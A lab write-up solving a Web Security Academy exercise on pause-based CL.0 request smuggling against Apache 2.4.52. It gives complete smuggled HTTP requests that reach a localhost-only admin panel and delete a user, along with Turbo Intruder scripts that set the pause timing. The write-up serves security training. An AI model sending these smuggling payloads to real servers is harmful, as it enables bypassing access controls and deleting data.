Lab: Server side pause based request smuggling

After starting the exercise, the blog should look similar to the one shown in the following figure.

We now switch to Burp Suite and open Burp Proxy. In Burp Proxy, we go to the HTTP history tab and look at the response to the first request sent to the application after starting the exercise. The application runs on an Apache web server, as we can see from the Server header. The exact version is: Apache/2.4.52.

If we search for known vulnerabilities in the Apache version, we will find them on the website rapid7.com (https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2022-22720/). This version of Apache is potentially vulnerable to pause-based CL.0 attacks on endpoints that trigger server-level redirects.

We send the request to the Burp Repeater using the key combination CTRL + R and switch to it. In the first line of the request, we enter the endpoint /resources and send the request.

GET /resources HTTP/1.1
Host: 0a5e00c003887e9583e0f5ff00d20061.web-security-academy.net
Cookie: session=D7wYEYMmX6R5u7igZkFuPz4xRnclPZCa
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

The response is HTTP/2 302 Found, which redirects us to the endpoint /resources/. We now make the following adjustments to our request. First, we change the HTTP method from GET to POST. To do this, we right-click on the request and select the option Change request method. Please ensure that you use HTTP/1.1 instead of HTTP/2. We remove all other headers except for the Cookie, Content-Type and Content-Length headers. The complete request looks as follows.

POST /resources HTTP/1.1
Host: 0a5e00c003887e9583e0f5ff00d20061.web-security-academy.net
Cookie: session=D7wYEYMmX6R5u7igZkFuPz4xRnclPZCa
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

We will now send the request to Turbo Intruder. To do this, we right-click and select Extensions -> Turbo Intruder -> Send to turbo intruder. If you do not have the extension, you will need to install Turbo Intruder from the BApp Store.

In Turbo Intruder, we extend our request with a smuggled request that accesses the endpoint /admin. The request should now look like this.

POST /resources HTTP/1.1
Host: 0afc008d042ad207823e5ba200e000a7.web-security-academy.net
Cookie: session=8s2GYh8FWsxrjNqiGgtToj1XdSx3NI5U
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

GET /admin/ HTTP/1.1
Host: 0afc008d042ad207823e5ba200e000a7.web-security-academy.net

It is important to include \r\n\r\n at the end of the body. The value of Content-Length is not relevant here. We make the following changes in the Turbo Intruder code editor. We add a pauseMarker=['\r\n\r\n'] and the duration of the pause with pauseTime=61000 (line 8). This tells Turbo Intruder to wait 61 seconds after \r\n\r\n. The complete code looks like this.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=500,
                           pipeline=False
                           )
                           
    engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000)
    engine.queue(target.req)

def handleResponse(req, interesting):
    table.add(req)

We start the attack by clicking on the Attack button. After 61 seconds, we receive two entries in the table. If we take a closer look at the second entry, we see an HTTP/1.1 401 Unauthorised response, which tells us that only local users have access to the admin panel.

In Turbo Intruder, we now change the value of the host header from 0afc008d042ad207823e5ba200e000a7.web-security-academy.net to localhost. The request now looks like this.

POST /resources HTTP/1.1
Host: 0afc008d042ad207823e5ba200e000a7.web-security-academy.net
Cookie: session=8s2GYh8FWsxrjNqiGgtToj1XdSx3NI5U
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

GET /admin/ HTTP/1.1
Host: localhost

By clicking on the Attack button, we start the attack again. After 61 seconds, we receive two entries in the table again. This time, the second entry contains an HTTP/1.1 200 OK response, which now allows us to access the admin panel. From this response, we copy the value of the Cookie (session=JrTqoSaXAvqZw1pJnQImW3jEs9jQt03J) header and the value of the CSRF token in the hidden HTML field csrf field (5YhWCcVv4y5uGUJYSQkj2masCqbLH0Zv).

These two values (session and csrf) must be renewed with each attempt.

Now we adjust our request in Turbo Intruder as follows. We change the HTTP method of our smuggled request from GET to POST and insert the endpoint that allows us to delete the user Carlos. This endpoint is /admin/delete/, which we can also see in the previous response. Then we add the headers Content-Type and Content-Length. The value of the Content-Length header is not relevant here. In the body of the request, we add the following line.

csrf=5YhWCcVv4y5uGUJYSQkj2masCqbLH0Zv&username=carlos&x=

The value of the CSRF token is from the previous response. At the end of the line, we add x= to prevent the username carlos from being invalidated with data from another request. In the first request, we replace the value of the Cookie header with the value determined earlier (JrTqoSaXAvqZw1pJnQImW3jEs9jQt03J). We adjust the value of the Content-Length header to the length of the body, in this case 174. The complete request looks as follows.

POST /resources HTTP/1.1
Host: 0a09006b04183da981d439b2004900b4.web-security-academy.net
Cookie: session=JrTqoSaXAvqZw1pJnQImW3jEs9jQt03J
Content-Type: application/x-www-form-urlencoded
Content-Length: 174

POST /admin/delete/ HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

csrf=5YhWCcVv4y5uGUJYSQkj2masCqbLH0Zv&username=carlos&x=

In the code section of Turbo Intruder, we insert a follow-up request that is sent after our smuggled request. In our pauseMarker, we enter our Content-Type header with the value 174. The complete code looks as follows.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=500,
                           pipeline=False
                           )

    engine.queue(target.req, pauseMarker=['Content-Length: 174\r\n\r\n'], pauseTime=61000)
    followUp = 'GET / HTTP/1.1\r\nHost: localhost\r\n\r\n'
    engine.queue(followUp)

def handleResponse(req, interesting):
    table.add(req)

We start the attack by clicking on the Attack button. After 61 seconds, we have successfully completed the exercise.

Video solution